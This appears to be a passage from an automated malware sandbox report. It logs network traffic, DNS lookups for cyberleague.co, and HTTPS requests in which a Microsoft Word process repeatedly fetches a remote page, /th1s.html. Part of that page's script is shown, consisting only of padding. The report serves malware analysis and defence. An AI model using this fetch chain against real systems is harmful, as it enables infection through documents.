                                                                                                                                                              Jun 3, 2022 23:03:20.387542009 CEST49749443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:20.387569904 CEST49749443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:20.387645006 CEST49749443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:20.387676001 CEST4434974913.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:20.387691975 CEST49749443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:20.387777090 CEST49749443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:20.431368113 CEST49750443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:20.431452990 CEST4434975013.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:20.431574106 CEST49750443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:20.431767941 CEST49750443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:20.431787014 CEST4434975013.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:20.812314987 CEST4434975013.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:20.813051939 CEST49750443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:20.813095093 CEST4434975013.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:20.815042019 CEST49750443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:20.815063000 CEST4434975013.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.188411951 CEST4434975013.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.188580036 CEST4434975013.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.188710928 CEST49750443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:21.309567928 CEST49750443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:21.309632063 CEST4434975013.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.309654951 CEST49750443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:21.309670925 CEST4434975013.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.334511995 CEST49751443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:21.334573030 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.334682941 CEST49751443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:21.374809980 CEST49751443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:21.374881983 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.755670071 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.756138086 CEST49751443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:21.756165028 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:21.811460018 CEST49751443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:21.811491013 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.136460066 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.136626005 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.136754990 CEST49751443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.421732903 CEST49751443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.421775103 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.421825886 CEST49751443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.421842098 CEST4434975113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.429121971 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.429176092 CEST4434975213.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.429279089 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.429510117 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.429531097 CEST4434975213.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.849932909 CEST4434975213.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.850053072 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.853833914 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.853871107 CEST4434975213.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:22.856193066 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:22.856214046 CEST4434975213.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:23.266453981 CEST4434975213.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:23.266604900 CEST4434975213.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:23.266632080 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:23.266696930 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:23.810359955 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:23.810405970 CEST4434975213.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:23.810518980 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:23.810550928 CEST49752443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.043535948 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.043626070 CEST4434975313.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:24.043754101 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.044137955 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.044167995 CEST4434975313.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:24.451858044 CEST4434975313.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:24.452018023 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.452374935 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.452390909 CEST4434975313.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:24.454803944 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.454819918 CEST4434975313.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:24.855674982 CEST4434975313.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:24.855797052 CEST4434975313.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:24.855946064 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.855989933 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.856014967 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.856050968 CEST4434975313.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:24.856117964 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:24.856129885 CEST49753443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.031929016 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.032002926 CEST4434975413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:25.032176971 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.032753944 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.032780886 CEST4434975413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:25.412844896 CEST4434975413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:25.413141012 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.418405056 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.418438911 CEST4434975413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:25.421214104 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.421247005 CEST4434975413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:25.790615082 CEST4434975413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:25.790733099 CEST4434975413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:25.790827990 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.790849924 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.790931940 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.790952921 CEST4434975413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:25.790970087 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:25.791033983 CEST49754443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:28.504662991 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:28.504743099 CEST4434975513.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:28.504865885 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:28.505152941 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:28.505171061 CEST4434975513.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:28.924880028 CEST4434975513.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:28.924987078 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:28.926331997 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:28.926354885 CEST4434975513.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:28.928816080 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:28.928831100 CEST4434975513.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:29.342540026 CEST4434975513.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:29.342609882 CEST4434975513.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:29.342649937 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:29.342701912 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:29.342797995 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:29.342838049 CEST4434975513.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:29.342859983 CEST49755443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:29.342921972 CEST49755443192.168.2.313.250.15.191

                                                                                                                                                              UDP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jun 3, 2022 23:03:11.982377052 CEST5811653192.168.2.38.8.8.8
                                                                                                                                                              Jun 3, 2022 23:03:12.041520119 CEST53581168.8.8.8192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:17.620388031 CEST6535853192.168.2.38.8.8.8
                                                                                                                                                              Jun 3, 2022 23:03:17.727202892 CEST53653588.8.8.8192.168.2.3

                                                                                                                                                              DNS Queries

                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                              Jun 3, 2022 23:03:11.982377052 CEST192.168.2.38.8.8.80x8c64Standard query (0)cyberleague.coA (IP address)IN (0x0001)
                                                                                                                                                              Jun 3, 2022 23:03:17.620388031 CEST192.168.2.38.8.8.80x2d69Standard query (0)cyberleague.coA (IP address)IN (0x0001)

                                                                                                                                                              DNS Answers

                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                              Jun 3, 2022 23:03:12.041520119 CEST8.8.8.8192.168.2.30x8c64No error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
                                                                                                                                                              Jun 3, 2022 23:03:17.727202892 CEST8.8.8.8192.168.2.30x2d69No error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)

                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                              • cyberleague.co

                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              0192.168.2.34974113.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2022-06-03 21:03:12 UTC0OUTOPTIONS / HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Authorization: Bearer
                                                                                                                                                              User-Agent: Microsoft Office Word 2014
                                                                                                                                                              X-Office-Major-Version: 16
                                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                                              X-FeatureVersion: 1
                                                                                                                                                              X-MSGETWEBURL: t
                                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                                              Host: cyberleague.co
                                                                                                                                                              2022-06-03 21:03:12 UTC0INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 03 Jun 2022 21:03:12 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: close
                                                                                                                                                              Allow: GET,POST,OPTIONS,HEAD,TRACE


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              1192.168.2.34974413.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2022-06-03 21:03:13 UTC0OUTHEAD /th1s.html HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Authorization: Bearer
                                                                                                                                                              User-Agent: Microsoft Office Word 2014
                                                                                                                                                              X-Office-Major-Version: 16
                                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                                              X-FeatureVersion: 1
                                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                                              Host: cyberleague.co
                                                                                                                                                              2022-06-03 21:03:13 UTC0INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 03 Jun 2022 21:03:13 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 5092
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                              ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                              Accept-Ranges: bytes


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              10192.168.2.34975413.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2022-06-03 21:03:25 UTC9OUTHEAD /th1s.html HTTP/1.1
                                                                                                                                                              Authorization: Bearer
                                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                                              User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                              Host: cyberleague.co
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2022-06-03 21:03:25 UTC9INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 03 Jun 2022 21:03:25 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 5092
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                              ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                              Accept-Ranges: bytes


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              11192.168.2.34975513.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2022-06-03 21:03:28 UTC10OUTHEAD /th1s.html HTTP/1.1
                                                                                                                                                              Authorization: Bearer
                                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                                              User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                              Host: cyberleague.co
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2022-06-03 21:03:29 UTC10INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 03 Jun 2022 21:03:29 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 5092
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                              ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                              Accept-Ranges: bytes


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              2192.168.2.34974613.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2022-06-03 21:03:17 UTC0OUTOPTIONS / HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Authorization: Bearer
                                                                                                                                                              User-Agent: Microsoft Office Word 2014
                                                                                                                                                              X-Office-Major-Version: 16
                                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                                              X-FeatureVersion: 1
                                                                                                                                                              X-MSGETWEBURL: t
                                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                                              Host: cyberleague.co
                                                                                                                                                              2022-06-03 21:03:17 UTC1INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 03 Jun 2022 21:03:17 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: close
                                                                                                                                                              Allow: GET,POST,OPTIONS,HEAD,TRACE


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              3192.168.2.34974713.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2022-06-03 21:03:18 UTC1OUTGET /th1s.html HTTP/1.1
                                                                                                                                                              Accept: */*
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Host: cyberleague.co
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2022-06-03 21:03:18 UTC1INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 03 Jun 2022 21:03:18 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 5092
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                              ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              2022-06-03 21:03:18 UTC1INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 20 20 20 20 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><body> <script> //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              4192.168.2.34974813.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2022-06-03 21:03:19 UTC6OUTHEAD /th1s.html HTTP/1.1
                                                                                                                                                              Authorization: Bearer
                                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                                              User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                              Host: cyberleague.co
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2022-06-03 21:03:19 UTC7INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 03 Jun 2022 21:03:19 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 5092
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                              ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                              Accept-Ranges: bytes


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              5192.168.2.34974913.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2022-06-03 21:03:20 UTC7OUTHEAD /th1s.html HTTP/1.1
                                                                                                                                                              Authorization: Bearer
                                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                                              User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                              Host: cyberleague.co
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2022-06-03 21:03:20 UTC7INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 03 Jun 2022 21:03:20 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 5092
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                              ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                              Accept-Ranges: bytes


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              6192.168.2.34975013.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2022-06-03 21:03:20 UTC7OUTOPTIONS / HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Authorization: Bearer
                                                                                                                                                              User-Agent: Microsoft Office Word 2014
                                                                                                                                                              X-Office-Major-Version: 16
                                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                                              X-FeatureVersion: 1
                                                                                                                                                              X-MSGETWEBURL: t
                                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                                              Host: cyberleague.co
                                                                                                                                                              2022-06-03 21:03:21 UTC7INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 03 Jun 2022 21:03:21 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: close
                                                                                                                                                              Allow: GET,POST,OPTIONS,HEAD,TRACE


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              7192.168.2.34975113.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2022-06-03 21:03:21 UTC8OUTHEAD /th1s.html HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Authorization: Bearer
                                                                                                                                                              User-Agent: Microsoft Office Word 2014
                                                                                                                                                              X-Office-Major-Version: 16
                                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                                              X-FeatureVersion: 1
                                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                                              Host: cyberleague.co
                                                                                                                                                              2022-06-03 21:03:22 UTC8INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 03 Jun 2022 21:03:22 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 5092
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                              ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                              Accept-Ranges: bytes


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              8192.168.2.34975213.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2022-06-03 21:03:22 UTC8OUTGET /th1s.html HTTP/1.1
                                                                                                                                                              Accept: */*
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Host: cyberleague.co
                                                                                                                                                              If-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                              If-None-Match: "13e4-5e063d0e1ca1e"
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2022-06-03 21:03:23 UTC8INHTTP/1.1 304 Not Modified
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 03 Jun 2022 21:03:23 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                              ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                              Accept-Ranges: bytes


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              9192.168.2.34975313.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2022-06-03 21:03:24 UTC9OUTHEAD /th1s.html HTTP/1.1
                                                                                                                                                              Authorization: Bearer
                                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                                              User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                              Host: cyberleague.co
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2022-06-03 21:03:24 UTC9INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 03 Jun 2022 21:03:24 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 5092
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                              ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                              Accept-Ranges: bytes


                                                                                                                                                              Statistics

                                                                                                                                                              CPU Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Memory Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Behavior

                                                                                                                                                              Click to jump to process

                                                                                                                                                              System Behavior

                                                                                                                                                              General

                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:23:03:06
                                                                                                                                                              Start date:03/06/2022
